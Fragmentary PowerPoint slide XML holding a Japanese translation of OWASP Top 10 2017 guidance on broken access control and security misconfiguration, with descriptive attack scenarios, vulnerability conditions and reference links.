                        <a:t>と動的アプリケーションテストツール</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="800" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>DAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>はアクセス制御の不存在を検出できますが、それが存在する場合にアクセス制御が有効に機能していることを検証することはできません。アクセス制御は、手作業で、場合によっては特定のフレームワークにおけるアクセス制御の不存在の自動チェックによって発見することができます。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>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ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>アクセス制御上の欠陥は、一般に、自動検出が行われないことやアプリケーション開発者による効果的な機能テストが行われないことによって生じます。 アクセス制御の検出は、通常は自動化された静的または動的テストには適していません。 手動テストは、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>HTTP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>メソッド（</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>GET</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>対</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>PUT</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>など）、コントローラ、オブジェクト直接参照などでの欠落している、もしくは機能していないアクセス制御を検出するための最良の方法です。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>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ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>技術への影響は、攻撃者が一般ユーザ、管理者、または特権機能を持ったユーザとして振る舞ったり、すべてのレコードの作成、アクセス、更新、削除を行ってしまうことです。ビジネスへの影響は、アプリケーションとデータの保護の重要性に依存します。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>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pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>シナリオ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>#1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>アプリケーションのサンプルが付属しているアプリケーションサーバであるにもかかわらず、プロダクションサーバからサンプルが削除されていません。このサンプルアプリケーションには、攻撃者がサーバに侵入する際によく使う既知の脆弱性があります。そのアプリケーションが管理用のコンソールでデフォルトのアカウントが変更されていないと、攻撃者はデフォルトのパスワードを使ってログインし、乗っ取ってしまいます。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>シナリオ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>#2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ディレクトリリスティングがサーバ上で無効になっていません。攻撃者はそれを見つけ出し、やすやすとディレクトリを表示してしまいます。攻撃者はコンパイル済みの</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>クラスを見つけてダウンロードし、デコンパイルしてからリバースエンジニアリングしてコードを見ます。そして攻撃者は、そのアプリケーションの深刻なアクセス制御上の穴を見つけます。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>シナリオ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>#3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>アプリケーションサーバの設定が、詳細なエラーメッセージ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>例えば、スタックトレース</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>をユーザに返すようになっています。これによって機微な情報や脆弱であるとされているコンポーネントのバージョンといった潜在的な欠陥がさらされる恐れがあります。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>シナリオ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>#4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>クラウドサービスプロバイダは、他の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ユーザによるデフォルトでインターネットに公開された共有パーミッションを用意しています。こうなると、機微な情報がクラウドストレージに保存され、アクセスされてしまいます。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>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pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>アプリケーションが下記のようなら、恐らく脆弱です。</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アプリケーションスタックのいずれかの部分におけるセキュリティ堅牢化の不足、あるいはクラウドサービスでパーミッションが不適切に設定されている。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必要のない機能が有効、あるいはインストールされている</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>例えば、必要のないポートやサービス、ページ、アカウント、特権</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>。</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デフォルトのアカウントとパスワードが有効になったまま変更されていない。</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エラー処理がユーザに対して、スタックトレースやその他余計な情報を含むエラーメッセージを見せる。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アップグレードしたシステムでは、最新のセキュリティ機能が無効になっているか正しく設定されていない。</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アプリケーションサーバやアプリケーションフレームワーク</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>例えば、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Struts、Spring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>、 ASP.NET)、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ライブラリ、データベース等のセキュリティの設定が、安全な値に設定されていない。</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サーバがセキュリテイヘッダーやディレクティブを送らなかったり、安全な値に設定されていなかったりする。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ソフトウェアが古いか脆弱である </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A9:2017-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>既知の脆弱性のあるコンポーネントの使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>を参照</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>アプリケーションのセキュリティを設定するプロセスを一致協力して繰り返さないと、システムのリスクはより高くなります。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP"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Security Headers Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>この分野でさらに知りたいのなら、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Application Security Verification Standard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>V19 Configuration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>を参照してください。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9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ja-JP" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>外部資料</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId1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NIST 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CWE-2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>Environmental 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CWE-16: Configuration</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CWE-388: Error Handling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CIS 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6"/>
              </a:rPr>
              <a:t>Amazon S3 Bucket Discovery and Enumeration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latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>安全にインストールするプロセスにおいて、以下のことを実施すべきです</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
